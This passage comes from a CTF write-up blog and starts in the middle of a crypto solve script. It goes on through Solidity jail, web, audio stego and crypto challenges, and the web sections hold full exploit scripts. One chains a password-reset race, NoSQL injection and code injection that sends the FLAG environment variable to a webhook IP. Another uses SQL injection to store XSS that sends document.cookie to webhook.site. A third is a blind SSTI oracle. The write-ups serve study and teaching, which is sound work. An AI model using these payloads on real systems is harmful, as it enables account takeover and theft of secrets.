    # Check if (y3^2) % p == (x3^3 + a*x3 + b) % p
    lhs = y3**2 % p
    rhs = (x3**3 + a * x3 + b) % p

    if lhs == rhs:
        return p, a, b

    return None, None, None

def lsb_oracle(r, P):
    l, u = 0, n

    c = enc_flag
    e2 = pow(2, e, n)
    for _ in trange(n.bit_length()):
        c *= e2
        Q = E(sign(r, c % n, P.xy()[0])) - sp
        if Q == E.zero():
            u = (l + u) >> 1
        else:
            l = (l + u) >> 1
    return (l + u) >> 1

r = remote('ecrsa.challs.cornc.tf', 1337, ssl=True) if args.REMOTE else process('./ecrsa.sage')

e = 65537
r.recvuntil(b'n: ')
n = int(r.recvline(False).decode())
r.recvuntil(b'k: ')
enc_flag = int(r.recvline(False).decode())

p, a, b = solve_curve_parameters(r)
E = EllipticCurve(GF(p), [a, b])
# order = E.order()
# Cached for speed
order = 16069075899419272706313306230384148392684766596987923274252840802156807638348274231565457533546984784193487763139164096443059279726687808489053779972143886
E.set_order(order)
q = order // 2

# Get point of order 2
while (P := E.random_point()).order() != order: continue
P *= q

assert P.order() == 2

# Get secret point
sp = E(sign(r, 2*n, 1))

m = lsb_oracle(r, P)
# Last byte isn't always right, just ignore and force the }
print('flag:', int(m).to_bytes(64)[:-1].decode() + '}')


r.close()

flag: :spoiler[corn{br34k1ng_dl0g_15_h4rd_bu7_m0d_2_m4k35_3v3ry7h1ng_funn13r!!}]

WWWFctf2025 | Solidity Jail 1

Mon, 25 Aug 2025 00:00:00 GMT

Introduction

Jail challenges are always a thrill. You’re thrown into a restricted environment with a single mission: escape and claim the flag. While bash, Python, and even NodeJS jails are familiar territory, running into one in Solidity is a rare treat.

In this challenge, we interacted with a remote server that executed Solidity function code we submitted. The goal? Extract a flag from another contract on the same blockchain. But there was a twist: a blacklist carefully crafted to block obvious approaches.

Navigating this puzzle felt like exploring the EVM itself. Dead ends and misleading paths were everywhere. Yet the final solution emerged smoothly, clever in its simplicity, proving that even the trickiest Solidity jail can be cracked with the right insight.

Analysis of the challange

First off, let’s scope out the setup. We were provided with two key files:

Jail.sol: The target contract, named in the solidity as BytecodeRunner, which features a public variable called flag and a run() function.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract BytecodeRunner {

    string public flag = "wwf{REDACTED}";

    function run(bytes memory _bytecode, bytes32 _salt) public
    returns (bool success, bytes memory result)
    {
        address newContract;
        assembly {
            newContract := create2(
                0,
                add(_bytecode, 0x20),
                mload(_bytecode),
                _salt
            )
            if iszero(newContract) {
                revert(0, 0)
            }
        }

        bytes memory callData = abi.encodeWithSelector(
            bytes4(keccak256("main()"))
        );

        (success, result) = newContract.call(callData);
        require(success, "Execution of main() failed.");
    }
}

As you can see, the run() function takes our bytecode, deploys it using create2, and then calls our main() function.

jailTalk.py: The server-side helper. It wraps whatever we submit inside a Solution contract, compiles it, and sends the resulting bytecode to the run function of BytecodeRunner.


#!/usr/local/bin/python
import signal
from solcx import compile_standard
import os
from web3 import Web3
import string
import requests
from urllib.parse import urlparse

contr_add = os.environ.get("CONTRACT_ADDDR")
rpc_url = os.environ.get("RPC_URL")

try:
    parsed = urlparse(rpc_url)
    resp = requests.get(f"{parsed.scheme}://{parsed.netloc}")
    if resp.text != "ok":
        print("Contact admins challenge not working...")
        exit()
except Exception as e:
    print("Contact admins challenge not working...")
    exit()


print("Enter the body of main() (end with three blank lines):")
lines = []
empty_count = 0
while True:
    try:
        line = input()
    except EOFError:
        break
    if line.strip() == "":
        empty_count += 1
    else:
        empty_count = 0
    if empty_count >= 3:
        lines = lines[:-2]
        break
    lines.append(line)

body = "\n".join(f"        {l}" for l in lines)

if not all(ch in string.printable for ch in body):
    raise ValueError("Non-printable characters detected in contract.")

blacklist = [
    "flag",
    "transfer",
    "address",
    "this",
    "block",
    "tx",
    "origin",
    "gas",
    "fallback",
    "receive",
    "selfdestruct",
    "suicide"
]
if any(banned in body for banned in blacklist):
    raise ValueError(f"Blacklisted string found in contract.")


source = f"""// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract Solution {{
    function main() external returns (string memory) {{
{body}
    }}
}}
"""

print("Final contract with inserted main() body:")
print(source)

compiled = compile_standard(
    {
        "language": "Solidity",
        "sources": {"Solution.sol": {"content": source}},
        "settings": {
            "outputSelection": {
                "*": {
                    "*": ["evm.bytecode.object"]
                }
            }
        },
    },
    solc_version="0.8.20",
)


bytecode_hex = "0x" + compiled["contracts"]["Solution.sol"]["Solution"]["evm"]["bytecode"]["object"]
salt_hex = "0x" + os.urandom(32).hex()

web3 = Web3(Web3.HTTPProvider(rpc_url))

contr_abi = [{"inputs":[],"name":"flag","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes","name":"_bytecode","type":"bytes"},{"internalType":"bytes32","name":"_salt","type":"bytes32"}],"name":"run","outputs":[{"internalType":"bool","name":"success","type":"bool"},{"internalType":"bytes","name":"result","type":"bytes"}],"stateMutability":"nonpayable","type":"function"}]
contr = web3.eth.contract(address=contr_add, abi=contr_abi)

bytecode_bytes = Web3.to_bytes(hexstr=bytecode_hex)
salt_bytes = Web3.to_bytes(hexstr=salt_hex)
print(contr.functions.run(bytecode_bytes, salt_bytes).call())

Here, the most crucial part is obv the blacklist.

This blacklist effectively blocks the most straightforward exploits:

flag: Directly calling target.flag() is prohibited.
address: We cannot declare an address variable to hold the target contract's location.
gas: Access to the gas() opcode is restricted, which is often needed for low-level calls.
this: Retrieving our own contract's address is also disallowed.

The goal is clear: invoke the flag() function on the BytecodeRunner contract.
Since main() is executed by BytecodeRunner, the contract's address is simply msg.sender.
The challenge comes down to circumventing these blacklist limitations basically.

My Solve

Looking at other write-ups for this challenge, it’s clear that there were a variety of approaches to solving it. Some solutions focused heavily on the Python side, manipulating the server-side logic (like sub-stringing the "flag" keyword), while others leaned more on Solidity, crafting intricate contracts to bypass restrictions (like the definition of an interface with the same function name and type signature, then cast the contract’s address to that interface). In my case, I believe I tackled the challenge using the simplest and most straightforward method possible. In fact:

I executed the function via a low-level call, specifically using the .call() method on an address and supplying the calldata manually. But how can you calculate a calldata?

There are multiple techniques to construct the calldata in Solidity for a function invocation. Common methods include:

abi.encodeWithSignature("functionName(types...)")
abi.encodeCall(ContractName.functionName, (args...))
abi.encodeWithSelector(bytes4Selector, (args...))

The first two methods rely on providing the function name as a string, which is explicitly blacklisted, so we can't use them. Therefore, using the last one: abi.encodeWithSelector, it allows us to bypass this restriction using a function selector.

A function selector is derived as the first 4 bytes of the Keccak-256 hash of its canonical signature -> $ \text{bytes4}(\text{keccak256}("functionName(inputTypes)")) $. In our case flag() has no input types, so it will be empty.

The selector for flag() is 0x890eba68. I used Foundry’s cast sig command to compute this easily.

We also need to bypass the restriction on using the address keyword. Because the main() function is executed by the target contract itself, its address is inherently available via msg.sender. This removes the necessity of defining a separate address variable. By combining the appropriate function selector with msg.sender as the destination, a conventional low-level .call() invocation suffices to execute the target function, thereby resolving the challenge.

The Payload:

(bool ok, bytes memory res) = msg.sender.staticcall(
    abi.encodeWithSelector(0x890eba68)
);
require(ok, "failed");
return string(res);

flag: :spoiler[wwf{y0u_4r3_7h3_7ru3_m4573r_0f_s0l1d17y}]

WWFctf2025 | Blank Login

Tue, 29 Jul 2025 00:00:00 GMT

Introduction

This is the third web application I've exploited. It's a very cool challenge, not too complex, and very fun. There's a not-very-easy race condition to spot. In fact, I think that's the most difficult part. So, let's start.

We have a small Flask application with about 200 lines of code, so it's not too bad. The first page is a login page without a register page.

The first thing to do is read the code.

Source

We can start with the set up of the flask application

# filename: main.py

# Flask setup - session store
app = Flask(__name__)
app.secret_key = bcrypt.hashpw(secrets.token_urlsafe(24).encode(), bcrypt.gensalt()).hex()
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)

# MongoDB setup - users
mongo_client = MongoClient("mongodb://mongo:27017/")
mongo_db = mongo_client["flaskdb"]
mongo_users = mongo_db["users"]
mongo_users.delete_many({})
admin_user = {
    "username": "admin",
    "password": bcrypt.hashpw(secrets.token_urlsafe(24).encode(), bcrypt.gensalt()).hex(),
    "email": "admin@securepractice.corp"
}
regular_user = {
    "username": "user",
    "password": bcrypt.hashpw(secrets.token_urlsafe(24).encode(), bcrypt.gensalt()).hex(),
    "email": "user@securepractice.corp"
}
mongo_users.insert_many([admin_user, regular_user])

# SQLite setup - audit trail
Base = declarative_base()
engine = create_engine("sqlite:///audit_log.db", connect_args={"check_same_thread": False})
SessionLocal = sessionmaker(bind=engine)

class SearchBase(Base):
    __tablename__ = "search_base"
    id = Column(Integer, primary_key=True)

class AuditLog(Base):
    __tablename__ = "audit_log"
    id = Column(Integer, primary_key=True)
    parent_id = Column(Integer, ForeignKey("search_base.id"))
    username = Column(String)
    action = Column(String)
    timestamp = Column(Integer)


# Other code....


if __name__ == "__main__":

    Base.metadata.create_all(bind=engine)

    # MySQL setup - reset tokens
    for _ in range(10):
        try:
            mysql_conn = mysql.connector.connect(
                host="mysql", user="root", password="rootpass", database="flaskdb"
            )
            if mysql_conn.is_connected():
                break
        except Error:
            time.sleep(3)
    if not mysql_conn:
        raise Exception("MySQL connection failed.")
    # Reset token setup
    cursor = mysql_conn.cursor(dictionary=True)
    cursor.execute("""
        CREATE TABLE IF NOT EXISTS reset_tokens (
            id INT AUTO_INCREMENT PRIMARY KEY,
            username CHAR(255),
            token CHAR(255) DEFAULT ''
        ) CHARACTER SET = utf8mb4 COLLATE = utf8mb4_general_ci;
    """)
    for username in ['user', 'admin']:
        cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
        cursor.execute("INSERT INTO reset_tokens (username) VALUES (%s)", (username,))
        cursor.execute("UPDATE reset_tokens SET token = %s WHERE username = %s", (get_random_token(), username))
    mysql_conn.commit()
    cursor.close()
    mysql_conn.close()

    app.run(host="0.0.0.0", port=5000, debug=False, threaded=True)

Okay, so analyzing the code, we have:

Two registered a user: user and admin, with passwords that are securely and randomly generated.
We use three databases, each with a specific purpose.
- MySQL: Store the token for password resets.
- Mongo: Store users
- SQLite3: Store the audit logs. This is a bit strange, but okay.

Now, let's look at some endpoints.

#filename: main.py

# Main login page
@app.route("/login", methods=["GET", "POST"])
def login():
    error = None
    if request.method == "POST":
        username = request.form.get("username", "").strip()
        password = request.form.get("password", "").strip()
        if not re.fullmatch(r'^[\w@#$%^&+=!]{1,64}$', password):
            error = "Invalid password format."
        else:
            user = mongo_users.find_one({"username": username, "password": password})
            if user:
                session["email"] = user["email"]
                log_audit_event(username, "login_success")
                return redirect("/")
            log_audit_event(username, "login_failure")
            error = "Invalid credentials."
    return render_template("login.html", error=error)

# Allow users to change their email address
@app.route("/", methods=["GET", "POST"])
def me():
    if "email" not in session:
        return redirect("/login")
    current_email = session["email"]
    message = None
    if request.method == "POST":
        # Validate email
        new_email = request.get_json().get("new_email") if request.is_json else request.form.get("new_email")
        if mongo_users.find_one({"email": {"$eq": new_email}}):
            message = "That email is already in use."
        else:
            # Update email address
            result = mongo_users.update_one({"email": current_email}, {"$set": {"email": new_email}})
            if result.modified_count == 1:
                session["email"] = new_email
                message = "Email updated successfully"
            else:
                message = "Failed to update email."
    return render_template("me.html", email=session["email"], message=message)

# Administrators can view the audit logs
@app.route("/audit_logs", methods=["GET"])
def audit_logs():
    if "email" not in session:
        return redirect("/login")
    user = mongo_users.find_one({"email": session["email"]})
    if not user or user.get("username") != "admin":
        return "Access denied", 403
    order_by = request.args.get("order_by", "timestamp")
    if not any(order_by.startswith(col) for col in ['username', 'action', 'timestamp']):
        order_by = "timestamp"
    SearchBase.logs = relationship("AuditLog", order_by=f'AuditLog.{order_by}')
    db = SessionLocal()
    bases = db.query(SearchBase).all()
    logs = [log for base in bases for log in base.logs]
    db.close()
    return render_template("audit_logs.html", logs=logs)

# Users can request a new password
@app.route("/reset_request", methods=["GET", "POST"])
def reset_request():
    message = None
    if request.method == "POST":
        # Validate username
        username = request.form.get("username", "").strip()
        if not username:
            message = "Username is required."
        elif not username.isalnum():
            message = "Invalid username"
        elif 'admin' in username.lower():
            message = "Reset not allowed for admin"
        # Get user
        elif (user := mongo_users.find_one({"username": username})):
            conn = get_db()
            cursor = conn.cursor()
            try:
                # Remove all old entries
                cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
                conn.commit()
                # Create new entry
                cursor.execute("INSERT INTO reset_tokens (username) VALUES (%s)", (username,))
                conn.commit()
                # Set new token
                cursor.execute("UPDATE reset_tokens SET token = %s WHERE username = %s", (get_random_token(), username))
                conn.commit()
                message = "Reset email sent." # Backend job sends the reset email
            except:
                message = "Unhandled failure."
            finally:
                cursor.close()
        else:
            message = "User not found."
        return render_template("result.html", message=message)
    return render_template("reset_request.html")

# Users can set a new password with a valid reset token
@app.route("/reset", methods=["GET", "POST"])
def reset():
    message = None
    if request.method == "POST":
        # Validate password and token
        token = request.form.get("token", "")
        new_password = request.form.get("new_password", "")
        if not re.fullmatch(r'^[\w@#$%^&+=!]{6,64}$', new_password):
            message = "Invalid password format."
        elif not token or len(token) < 16:
            message = "Invalid token format."
        else:
            # Get user for token
            conn = get_db()
            cursor = conn.cursor(dictionary=True)
            cursor.execute("SELECT * FROM reset_tokens WHERE token = %s", (token,))
            row = cursor.fetchone()
            cursor.close()
            if row:
                # Reset user password
                username = row["username"].strip()
                mongo_users.update_one({"username": username}, {"$set": {"password": new_password}})
                cursor = conn.cursor()
                cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
                conn.commit()
                cursor.close()
                message = f"Password updated"
            else:
                message = "Invalid token."
        return render_template("result.html", message=message)
    return render_template("reset.html")

We have some cool endpoints:

/: Main route a route to change your email address while logged in.
/login: Pretty clear.
/audit_logs: An admin endpoint to view all audit logs.
/reset_request: Reset password request by username.
/reset: Resets the password using the username and token.

I think it's pretty straightforward, don't you?

Solution

The first step is to search for the flag position. In this case, it is in an env variable.

  web:
    build: .
    ports:
      - "5000:5000"
    depends_on:
      - mongo
      - mysql
    environment:
      - FLASK_ENV=production
      - FLAG=wwf{not_the_flag}

Okay, so the goal is to get RCE. The first thing to do is to check for SSTI, but that's not the case here.

Now, the most difficult part is checking all the code. The most suspicious things are:

NoSQL injection in the reset email form.

new_email = request.get_json().get("new_email") if request.is_json else request.form.get("new_email")

The line is bad because if we pass the header JSON, it passes all the objects, not just a string.

It's a sort of code injection in the SQLAlchemy function in the audit logs endpoint.

    if not any(order_by.startswith(col) for col in ['username', 'action', 'timestamp']):
        order_by = "timestamp"
    SearchBase.logs = relationship("AuditLog", order_by=f'AuditLog.{order_by}') # Not very good
    db = SessionLocal()
    bases = db.query(SearchBase).all()

Okay, nice. We have a code injection. Is that all? No, because to get access to the endpoint, we have to become an admin. We don't have a login for the user account, so it's pretty useless.

After much trial and error, I discovered a cool race condition between the /reset_request and /reset endpoints.

# Users can request a new password
@app.route("/reset_request", methods=["GET", "POST"])
def reset_request():
    message = None
    if request.method == "POST":
        # Validate username
        username = request.form.get("username", "").strip()
        if not username:
            message = "Username is required."
        elif not username.isalnum():
            message = "Invalid username"
        elif 'admin' in username.lower():
            message = "Reset not allowed for admin"
        # Get user
        elif (user := mongo_users.find_one({"username": username})):
            conn = get_db()
            cursor = conn.cursor()
            try:
                # Remove all old entries
                cursor.execute("DELETE FROM reset_tokens WHERE username = %s", (username,))
                conn.commit()
                # Create new entry
                cursor.execute("INSERT INTO reset_tokens (username) VALUES (%s)", (username,))
                conn.commit()
                # Set new token
                cursor.execute("UPDATE reset_tokens SET token = %s WHERE username = %s", (get_random_token(), username))
                conn.commit()
                message = "Reset email sent." # Backend job sends the reset email
            except:
                message = "Unhandled failure."
            finally:
                cursor.close()
        else:
            message = "User not found."
        return render_template("result.html", message=message)
    return render_template("reset_request.html")

When we make a reset request, the server makes three different commits, one for each query. In this case, it's very bad because there's a moment when the token is equal to an empty string. Especially, the database is set to CHARACTER SET = utf8mb4 COLLATE = utf8mb4_general_ci, so spaces are trimmed from the query.

We can basically make a /reset request and, at the same time, make a /reset_request. This allows us to change the password of ONLY the user (because the admin is blocked) and log in.

Okay, but how can we log in as an admin? Easy. Remember the NoSQLi we can use to bypass the admin check in the /audit_logs endpoint with a basic logic injection: { "$gt": ""} (This is a possible payload.) We can inject the payload thanks to the email change.

Now, if we try to make a GET request to /audit_logs, we have access, and we can make the code injections.

# filename: exploit.py
#!/usr/bin/python3
import random
import string
import threading
import urllib.parse
import requests

BASE_URL = "https://{instance_id}.chall.wwctf.com"
WEBHOOK_URL = "http://178.63.67.153/eb3102da-b96c-48b5-92c9-d59301574330/"

s = requests.Session()


payload_spaces = " " * 32
token_field   = urllib.parse.quote_plus(payload_spaces)
new_pass      = "cookie"

def spam_reset_request():
    while True:
        s.post(f"{BASE_URL}/reset_request",
                      data={"username": "user"},
                      timeout=3)

def race_reset():
    while True:
        data = {"token": payload_spaces, "new_password": new_pass}
        r = s.post(f"{BASE_URL}/reset", data=data, timeout=3)
        if "Password updated" in r.text:
            print("[+] Race WON!")
            break

def login():
    data = {"username": "user", "password": new_pass}
    r = s.post(f"{BASE_URL}/login", data=data)
    if "New Email" in r.text:
        print("[+] Logged in successfully!")
    else:
        print("[-] Failed to log in.")

def update_email():
    data = {"new_email":  { "$gt": "" }}
    r = s.post(f"{BASE_URL}", json=data)
    if "Email updated successfully" in r.text:
        print("[+] Email updated successfully!")
    else:
        print("[-] Failed to update email.")


def audit_logs():
    payload = f"(__import__('urllib.request', fromlist=['urlopen']).urlopen('{WEBHOOK_URL}?f='+(__import__('os').getenv('FLAG','NF'))))"
    r = s.get(f"{BASE_URL}/audit_logs",params={"order_by": f"timestamp.desc(),{payload}"})
    if "Access denied" in r.text:
        print("[-] Access denied to audit logs.")
    else:
        print("[+] Audit logs accessed successfully!")
        print(r.text)

def main():
    threading.Thread(target=spam_reset_request, daemon=True).start()
    race_reset()
    login()
    update_email()
    audit_logs()



if __name__ == "__main__":
	main()


# goodluck by @akiidjk

flag: :spoiler[wwf{Ju57_G1v3_mE_S0m3_5p4ce}]

L3akctf 2025 | Beneath the Surface

Sun, 13 Jul 2025 00:00:00 GMT

File

<audio controls> <source src="/audio/beneath_the_surface/beneath_the_surface.wav" type="audio/wav"> Your browser does not support the audio element. </audio> <a href="/audio/beneath_the_surface/beneath_the_surface.wav" download>Download</a>

Solution

exiftool beneath_the_surface.wav
ExifTool Version Number         : 13.30
File Name                       : beneath_the_surface.wav
Directory                       : .
File Size                       : 6.3 MB
File Modification Date/Time     : 2025:07:13 12:40:18+02:00
File Access Date/Time           : 2025:07:13 12:40:19+02:00
File Inode Change Date/Time     : 2025:07:13 12:40:18+02:00
File Permissions                : -rw-r--r--
File Type                       : WAV
File Type Extension             : wav
MIME Type                       : audio/x-wav
Encoding                        : Microsoft PCM
Num Channels                    : 1
Sample Rate                     : 8000
Avg Bytes Per Sec               : 16000
Bits Per Sample                 : 16
Title                           : Generated audio
Software                        : fldigi-4.2.07 (libsndfile-1.0.28)
Comment                         : WEFAX576 freq=14011.900
Date Created                    : 2025:07:11T10:21:36z
Duration                        : 0:06:35

The Software and Comment fields are useful, these indicate that the audio file was generated by fldigi which contains a WEFAX (Weather Facsimile) image, transmitted at 576 lines at a frequenct of 14011.900 kHz. So, I install fldigi with yay -S fldigi (I use Arch, btw). Open the program and go to Op mode -> WEFAX -> WEFAX576, and then, on the main window, set the frequency to 14011.9 kHz. Now, upload the file on File -> Audio -> Reproduction. Please be patient and wait for the program to decode the entire audio and get the flag.

flag: :spoiler[L3AK{R4diOF4X_1S_G00d_4_ImAG3_Tr4nsM1sSiON}]

CornCTF2025 | Simple Chat

Tue, 08 Jul 2025 00:00:00 GMT

Introduction

Okay, this is a really nice challenge. This is a pretty second CTF web challenge. It's a simple XSS with a twist.

Source

Let's look at two parts of the FUNDAMENTAL code

// filename: app.js

app.post('/api/v1/insertChat', async (req, res) => {
  const sender = req.body.sender;
  const receiver = req.body.receiver;
  var message = req.body.message;

  if (!FRIENDS.includes(sender) && sender !== 'admin' && sender !== 'kekw') {
    res.json({ 'status': "you can't write messages on behalf of other people." })
    return
  }

  if (!FRIENDS.includes(receiver) && receiver !== 'admin' && receiver !== 'kekw') {
    res.json({ 'status': "you can't write to nobody" })
    return;
  }

  //no XSS
  message = message.replaceAll('<', '&lt;');
  message = message.replaceAll('>', '&gt;');

  const result = await db.insertChat(sender, receiver, message);
  if (result != 0) {
    res.json({ 'status': "Couldn't insert the chat." });
    return;
  }
  const response = { 'status': 'Success' };
  res.json(response);
})

In the above script, we see that several checks are made for the sender and receiver when messages are inserted into chats. Most importantly, we see that the characters < and > are replaced with < and >, respectively, so that we cannot insert XSS directly.

// filename: db.js

async insertChat(sender, receiver, message) {
  try {
    const query = `INSERT INTO chat(sender,receiver,message) VALUES ('${sender}','${receiver}','${message}');`;
    await this.client.query(query);
  } catch (e) {
    console.log(`Error: ${e}`)
    return 1;
  }
  return 0;
}

Upon analyzing the DB calls, we see that a direct query insert is made. Therefore, we can exploit an SQLi to bypass the replace check. There are also SQLi's in every db query, so we can do whatever we want, like logging in as an admin, but that wasn't really necessary.

Solution

# filename: exploit.py

#!/usr/bin/python3
import random
import string

import requests

BASE_URL = "http://localhost"
# BASE_URL = "https://simple-chat-b6eb1bef.challs.cornc.tf"
URL_HOOK = "https://webhook.site/1911a3b8-9c48-468c-a2aa-05e81cb1df93"

s = requests.Session()

def string_generator(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

def getMessages(friend):
    r = s.get(BASE_URL + "/api/v1/fetchMessages", params={"friend[]": friend})
    if r.status_code != 200:
        print("Error getting messages")
        return None
    return r.json()

def getProfile():
    r = s.get(BASE_URL + "/api/v1/profile")
    if r.status_code != 200:
        print("Error getting profile")
        return None
    return r.json()

def login(username,password):
    r = s.post(BASE_URL + "/api/v1/login", json={"username": username, "password": password},headers={"Origin":"http://localhost"})
    if r.status_code != 200:
        print("Error login")
        return None
    return r.json()

def insertChat(sender,receiver,message):
    r = s.post(BASE_URL + "/api/v1/insertChat", json={"sender": sender, "receiver": receiver, "message": message})
    if r.status_code != 200:
        print("Error inserting chat")
        return None
    return r.json()

def build_payload_xss(sender, target_user, xss_url):
    js_payload = f"""img src="a" onerror="fetch('{URL_HOOK}?q='+document.cookie)");"""
    sql_payload = "chr(60)||'" + js_payload.replace("'", "''") + "'||chr(62)"
    injected_query = f"""aaa'); INSERT INTO chat(sender, receiver, message) VALUES ('{target_user}','admin',{sql_payload});-- """
    return injected_query

def ping():
    r = s.get(BASE_URL + "/ping",params={"friend":"Val"})
    if r.status_code != 200:
        print("Error pinging")
        return None
    return r.json()

def main():
    login("kekw", "kekw")
    print(s.cookies["connect.sid"])
    print(getMessages("Val"))
    print(getProfile())
    print(insertChat("kekw", "Val", "aaa'); UPDATE users SET password='cookie' WHERE username='Val'; --"))
    print(insertChat("kekw", "Val", build_payload_xss("kekw", "Val", URL_HOOK)))
    print(ping())

    # Wait for the XSS to trigger and send the cookie to the webhook


if __name__ == "__main__":
	main()


# goodluck by @akiidjk

flag: :spoiler[corn{d0ubl3_uns4n1t1z4tion_d4mnnnn_f45a85f9d6346d8b}]

Ulisse2025 | Telemetry

Tue, 08 Apr 2025 00:00:00 GMT

Introduction

Fourth round of the Cybercup 2025 ulisseCTF I want to show the writeup of the first web, a really interesting challenge.

Source

The application is a simple Flask app with 0 css (we almost like it).

We have 3 main pages:

index.html
check.html
upload.html

The thing that stands out is the way the logs are stored, in fact we see that a folder and a file are created for each individual user where the logs are stored, the challenge also refers to the logs so there is likely a related vulnerability, and finally it gives us the ability to run one of the rendered templates that we have in the templates folder, which NORMALLY are just the three html files listed above.

# filename: app.py

@app.route('/login', methods=['POST'])
def login():
    username = request.form['user']
    log_file = request.form['log']

    if len(log_file) != 32:
        flash('Invalid log filename length', 'danger')
        return redirect('/')

    user_id = str(uuid.UUID(log_file))
    log_file = user_id + '.txt'

    if os.path.exists(os.path.join('logs', username, log_file)):
        flash('User/Log already exists', 'danger')
        return redirect('/')

    session['user'] = (user_id, username)
    session['files'] = MAX_FILES

    os.makedirs(os.path.join('logs', username), exist_ok=True)
    with open(os.path.join('logs', username, log_file), 'w') as f:
        f.write(f'[{time.time()}] - Log file: {user_id}.txt\n')
        f.write(f'[{time.time()}] - User logged in\n')

    return redirect('/upload')

To begin the analysis, let us first understand how the login takes place...

We see that the username and the log_file name are taken from the form, the length of the log_file is checked, which must be 32 (number of UUIDv4 characters excluding the "-"), the log file is created, everything is entered into the session, and finally the logs are written to the file The things that stand out are 2 - The username is not sanitized - The username is used in the creation of the path, which is created insecurely

# filename: app.py
@app.route('/check', methods=['GET', 'POST'])
def check():
    if request.method == 'GET':
        return render_template('check.html')

    template = secure_filename(request.form['template'])
    if not os.path.exists(os.path.join('templates', template)):
        flash('Template not found', 'danger')
        return redirect('/check')
    try:
        render_template(template)
        flash('Template rendered successfully', 'success')
    except:
        flash('Error rendering template', 'danger')
    return redirect('/check')

@app.errorhandler(404)
def page_not_found(e):
    if user := session.get('user', None):
        if not os.path.exists(os.path.join('logs', user[1], user[0] + '.txt')):
            session.clear()
            return 'Page not found', 404
        with open(os.path.join('logs', user[1], user[0] + '.txt'), 'a') as f:
            f.write(f'[{time.time()}] - Error at page: {unquote(request.url)}\n')
        return redirect('/')
    return 'Page not found', 404

Now let us look at two more basic elements, the check function and this 404 handler The check function has nothing wrong or broken, so we don't care so much, the only interesting thing we see is that the template that is rendered is not returned, so we won't be able to see the output easily Instead an interesting thing we see is this 404 handler that logs the file when it is called and also writes the path we entered and that triggered it.

Solution

Well, the solution is really interesting because the main vulnerability is that we can give the user any name and that name is not sanitized THEN... we can give our user the name ../templates.

It may seem trivial, but this allows us to render our log file as a template... Next problem: how do we write arbitrary templates to the log file?

VERY SIMPLY via the 404 handler, which allows us to write whatever we want in the /endpoint that is returned in the file Well then, we just need to make a request to http://HOST/{config["FLAG"]} and get the flag, right?

Well no, remember that unfortunately the output is not returned when rendering the template... Well, just send the output somewhere or run a shell? Well, neither, because unfortunately there is a very robust sandbox that doesn't allow us to do almost anything.

# filename: file.py

class JinjaEnvironment(SandboxedEnvironment):
    # Simply wraps jinja's sandboxed environment so that it can be used with flask
    def __init__(self, app: Flask, **options) -> None:
        if "loader" not in options:
            options["loader"] = app.create_global_jinja_loader()
        SandboxedEnvironment.__init__(self, **options)
        self.app = app

app.jinja_environment = JinjaEnvironment
Session(app)

So how do we leak the value?

Well we can take inspiration from blind error based SQLi in this case and our script would look something like this

#filename: exploit.py
import random
import string
import os
import requests
import uuid

# BASE_URL = "http://telemetry.challs.ulisse.ovh:6969/"
BASE_URL = "http://localhost:6969"

s = requests.Session()

def login(username,logfile):
    r = s.post(BASE_URL + "/login", data={"user": username,"log": logfile})
    if r.status_code != 200:
        print("Login failed")
        print("Error:", r.text)

def trigger404(payload):
    r = s.get(BASE_URL + f"/{payload}")
    if r.status_code != 200:
        print("Trigger failed")
        print("Error:", r.text)
        print("Status Code:", r.status_code)

def trigger_template_render(user_id):
    data = {"template": user_id + ".txt"}
    r = s.post(BASE_URL + "/check", data=data)
    if "green" in r.text:
        return True
    else:
        return False

def restart():
    s.cookies.clear()
    username = "../templates"
    log = os.urandom(16).hex()
    user_id = str(uuid.UUID(log))
    login(username, log)
    return user_id

def exploit():
    alphabet = string.digits + "!_{}" + string.ascii_letters
    flag = ""
    user_id = restart()
    for index in range(len(flag),40):
        print(f"Index: {index}")
        for letter in alphabet:
            payload = f"{{{{ config['FLAG'][{index}] if config['FLAG'][{index}] == '{letter}' else 1/0 }}}}"
            trigger404(payload)
            res = trigger_template_render(user_id)
            if res:
                flag += letter
                print(f"Flag: {flag}")
                if letter == "}":
                    print("Flag found!")
                    return
                user_id = restart()
                break
            else:
                user_id = restart()
                continue

    print(f"Flag: {flag}")

def main():
    exploit()

if __name__ == "__main__":
	main()


# goodluck by @akiidjk

flag: :spoiler[UlisseCTF{n3x7_T1m3_st1ck_t0_your_l0g5!}]

K1ndasus2025 | Key in the haystack

Mon, 24 Mar 2025 00:00:00 GMT

Introduction

Haystack was a crypto CTF from K!nd4SUS CTF 2025.

from Crypto.Util import number
from base64 import b64encode

prime = lambda: number.getPrime(512)
def b64enc(x):
	h = hex(x)[2:]
	if len(h) % 2:
		h = '0' + h
	return b64encode(bytes.fromhex(h)).decode()


p = prime()
q = prime()
with open("flag.txt") as f:
	flag = f.readline().strip()

n = p * q
m = int(flag.encode().hex(), 16)
c = pow(m, 65537, n)

print("ciphertext:", hex(c)[2:])

bale = [p, q]
bale.extend(prime() for _ in range(1<<6))

def add_hay(stack, straw):
	x = stack[0]
	for i in range(1, len(stack)):
		y = stack[i]
		stack[i] = y + (straw * x)
		x = y
	stack.append(straw * x)

stack = [1]
add_hay(stack, p)
add_hay(stack, q)
for straw in bale:
	add_hay(stack, straw)

print("size:", len(stack))
for x in stack:
	print(b64enc(x))

The challenge encrypts the flag with RSA and constructs a stack via the add_hay function which we're then given to try to recover the primes $p$ and $q$ used to create the modulus $n$.

Solution

The intended solution is to solve the list of equations provided by stack, this is why the description suggests it might take about 10 minutes. But I found out a much simpler solution by simply "looking" at what stack looks like if $p$ and $q$ are seen as variables, which I simulated using sagemath:

sage: from Crypto.Util.number import getPrime
....:
....: p, q = PolynomialRing(ZZ, 'p,q').gens()
....: bale = [p, q]
....: bale.extend(getPrime(512) for _ in range(1<<6))
....:
....: def add_hay(stack, straw):
....:     x = stack[0]
....:     for i in range(1, len(stack)):
....:         y = stack[i]
....:         stack[i] = y + (straw * x)
....:         x = y
....:     stack.append(straw * x)
....:
....: stack = [1]
....: add_hay(stack, p)
....: add_hay(stack, q)
....: for straw in bale:
....:     add_hay(stack, straw)

